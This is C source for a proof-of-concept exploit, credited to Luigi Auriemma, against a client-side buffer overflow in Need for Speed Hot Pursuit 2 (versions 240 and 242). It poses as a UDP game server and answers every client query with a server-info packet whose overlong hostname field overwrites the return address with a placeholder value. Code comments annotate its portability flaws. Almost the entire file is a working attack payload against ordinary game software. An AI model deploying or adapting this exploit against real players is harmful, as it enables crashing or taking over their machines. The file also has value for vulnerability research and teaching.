
  1. /*
  2.  
  3. by Luigi Auriemma
  4.  
  5. UNIX & WIN VERSION
  6. */
  7.  
  8.  
  9. #include <stdio.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12.  
  13. #ifdef WIN32
  14.     #include <winsock.h>
  15.     #include "winerr.h"
  16.  
  17.     #define close   closesocket
  18. #else
  19.     #include <unistd.h>
  20.     #include <sys/socket.h>
  21.     #include <sys/types.h>
  22.     #include <arpa/inet.h>
  23.     #include <netdb.h>
  24. #endif
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31. #define VER     "0.1"
  32. #define BUFFSZ  2048
  33. #define PORT    61220
  34. #define RETADD  0xdeadc0de
  35. #define RETOFF  540
  36. #define NFS240  "18022640"
  37. #define NFS242  "18088178"
  38. #define NFSOFF  669     /* referred to pck[] nver, don't change it */
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45. void std_err(void);
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
/*
 * Entry point. Binds a UDP socket to PORT and answers every datagram it
 * receives with pck[], a fixed backslash-delimited server-info reply whose
 * \hostname\ value is an over-long run of 'a' followed by the 4-character
 * "0000" slot that is overwritten with RETADD before the loop starts.
 * argv[1] selects which \nver\ string is sent (NFS240 or NFS242); nothing
 * in the received datagram influences the reply.
 *
 * Exits with status 1 on a usage error; socket/allocation failures go
 * through std_err(), which exits. The receive loop never ends on its own.
 *
 * u_char / u_long are BSD / Winsock typedefs, not ISO C types.
 */
int main(int argc, char *argv[]) {
    int         sd,         // UDP socket descriptor
                err,        // return value of the most recent socket call
                on = 1,     // SO_REUSEADDR option value
                psz;        // sizeof(peer), passed as the address length
    struct  sockaddr_in peer;   // bind address, then the sender of each datagram
    u_char      *buff,      // BUFFSZ-byte receive buffer; contents never inspected
                pck[] =     // reply sent, unchanged, to every sender
                "\\gamename\\nfs6"
                "\\gamever\\240"    // it is useless
                "\\hostname\\"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaa"
                "0000"              // return address; starts at byte offset RETOFF (540) of pck[]
                "\\hostport\\8511"
                "\\mapname\\Fall Winds"
                "\\gametype\\Single Race"
                "\\numplayers\\1"
                "\\maxplayers\\8"
                "\\gamemode\\openplaying"
                "\\pbmd\\0"
                "\\password\\0"
                "\\nver\\" NFS240   // value starts at byte offset NFSOFF (669); replaced in place for 242
                "\\ctid\\6"
                "\\res\\38"
                "\\dir\\0"
                "\\laps\\2"
                "\\ded\\0"
                "\\final\\"
                "\\queryid\\2.1";


    setbuf(stdout, NULL);   // unbuffered stdout: each progress line is written immediately

    fputs("\n"
        "Need for Speed Hot pursuit 2 <= 242 client's buffer overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <version>\n"
            "\n"
            "Version:\n"
            "240 = this is the default (1.0) and more diffused version\n"
            "242 = the latest patched version, rarely used by players\n"
            "\n", argv[0]);
        exit(1);
    }


    // NOTE(review): memcmp() reads 3 bytes of argv[1] whatever its length, so an
    // argument shorter than 3 characters is read past its terminator; strcmp()
    // would be the bounded equivalent. Only the first 3 characters are compared,
    // so e.g. "2400" also selects 240.
    if(!memcmp(argv[1], "240", 3)) {
        printf("Selected version 240 (nver %s)\n", NFS240);   // pck[] already carries NFS240
    } else if(!memcmp(argv[1], "242", 3)) {
        printf("Selected version 242 (nver %s)\n", NFS242);
        // Overwrite the 8 nver digits in place; "- 1" drops the literal's NUL.
        memcpy(pck + NFSOFF, NFS242, sizeof(NFS242) - 1);
    } else {
        printf("\nError: you must choose between 240 and 242 only\n");
        exit(1);
    }


#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);    // Winsock init; return value not checked
#endif

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    peer.sin_addr.s_addr = INADDR_ANY;  // all-zero, so byte order does not matter here
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer); // int, while recvfrom() takes socklen_t *; typically the same width, may warn

    printf("\nBinding UDP port %u\n", PORT);

    // The (char *) cast matches the Winsock setsockopt() prototype; harmless on POSIX.
    err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
    if(err < 0) std_err();
    err = bind(sd, (struct sockaddr *)&peer, psz);
    if(err < 0) std_err();

    printf("The return address will be overwritten with 0x%08x\n", RETADD);
    // Type-punned store into the "0000" slot of pck[]: a possibly unaligned
    // u_long write through a u_char array (not well-defined ISO C), in host
    // byte order, and sizeof(u_long) bytes wide, which is platform-dependent.
    *(u_long *)(pck + RETOFF) = RETADD;

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    fputs("Clients:\n", stdout);
    while(1) {  // no break: the loop only ends when std_err() exits the process
        // recvfrom() overwrites peer with the sender's address, which sendto()
        // below replies to. The datagram's length and contents are ignored.
        err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
        if(err < 0) std_err();

        // htons() is used as a byte swap for printing; ntohs() would state the
        // intent (both are the same 16-bit operation).
        printf("%16s:%hu -> ",
            inet_ntoa(peer.sin_addr), htons(peer.sin_port));

        // sizeof(pck) - 1 excludes the terminating NUL of the initializer.
        err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, psz);
        if(err < 0) std_err();
        fputs("BOOM\n", stdout);
    }

    close(sd);  // unreachable: the while(1) above has no exit path
    return(0);
}
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177. #ifndef WIN32
    /*
     * Fatal-error exit used by main(): writes "\nError: <strerror(errno)>"
     * to stderr via perror() and terminates the process with status 1.
     * Only compiled outside WIN32; the Windows build presumably gets its
     * std_err() from "winerr.h".
     */
    void std_err(void) {
        const char *const prefix = "\nError";

        perror(prefix);
        exit(1);
    }
  182. #endif
  183.  
  184.  
  185.  
  186.